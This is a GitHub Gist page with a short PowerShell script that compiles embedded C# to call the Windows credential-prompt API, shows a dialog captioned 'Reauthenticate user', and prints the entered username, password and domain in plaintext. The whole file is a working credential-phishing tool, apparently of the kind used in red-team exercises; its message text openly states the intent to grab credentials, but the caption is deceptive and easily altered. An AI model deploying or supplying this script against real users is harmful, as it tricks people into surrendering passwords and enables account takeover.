Last active
January 19, 2021 15:27
-
-
Save khyberspache/e22cad35e27bb02992242fe9d20c5f14 to your computer and use it in GitHub Desktop.
Prompt a user for credentials on Windows and dump in plaintext
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $type=@" | |
| using System; | |
| using System.Text; | |
| using System.Runtime.InteropServices; | |
| public static class CredUI | |
| { | |
| [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] | |
| private struct CREDUI_INFO | |
| { | |
| public int cbSize; | |
| public IntPtr hwndParent; | |
| public string pszMessageText; | |
| public string pszCaptionText; | |
| public IntPtr hbmBanner; | |
| } | |
| [DllImport("credui.dll", CharSet = CharSet.Auto)] | |
| private static extern bool CredUnPackAuthenticationBuffer(int dwFlags, IntPtr pAuthBuffer, uint cbAuthBuffer, StringBuilder pszUserName, ref int pcchMaxUserName, StringBuilder pszDomainName, ref int pcchMaxDomainame, StringBuilder pszPassword, ref int pcchMaxPassword); | |
| [DllImport("credui.dll", CharSet = CharSet.Auto)] | |
| private static extern int CredUIPromptForWindowsCredentials(ref CREDUI_INFO notUsedHere, int authError, ref uint authPackage, IntPtr InAuthBuffer, uint InAuthBufferSize, out IntPtr refOutAuthBuffer, out uint refOutAuthBufferSize, ref bool fSave, int flags); | |
| public static void Prompt() { | |
| CREDUI_INFO credui = new CREDUI_INFO(); | |
| credui.pszCaptionText = "Reauthenticate user"; | |
| credui.pszMessageText = "This will allow us to grab your credentials in plaintext"; | |
| credui.cbSize = Marshal.SizeOf(credui); | |
| uint authPackage = 0; | |
| IntPtr outCredBuffer = new IntPtr(); | |
| uint outCredSize; | |
| bool save = false; | |
| int result = CredUIPromptForWindowsCredentials(ref credui, 0,ref authPackage,IntPtr.Zero, 0, out outCredBuffer, out outCredSize, ref save, 1 /* Generic */); | |
| var usernameBuf = new StringBuilder(100); | |
| var passwordBuf = new StringBuilder(100); | |
| var domainBuf = new StringBuilder(100); | |
| int maxUserName = 100; | |
| int maxDomain = 100; | |
| int maxPassword = 100; | |
| if (result == 0) | |
| { | |
| if (CredUnPackAuthenticationBuffer(0, outCredBuffer, outCredSize, usernameBuf, ref maxUserName, domainBuf, ref maxDomain, passwordBuf, ref maxPassword)) | |
| { | |
| Console.WriteLine("Username: {0}", usernameBuf.ToString()); | |
| Console.WriteLine("Password: {0}", passwordBuf.ToString()); | |
| Console.WriteLine("Domain: {0}", domainBuf.ToString()); | |
| return; | |
| } | |
| } | |
| } | |
| } | |
| "@ | |
| Add-Type -TypeDefinition $type; | |
| [CredUI]::Prompt(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment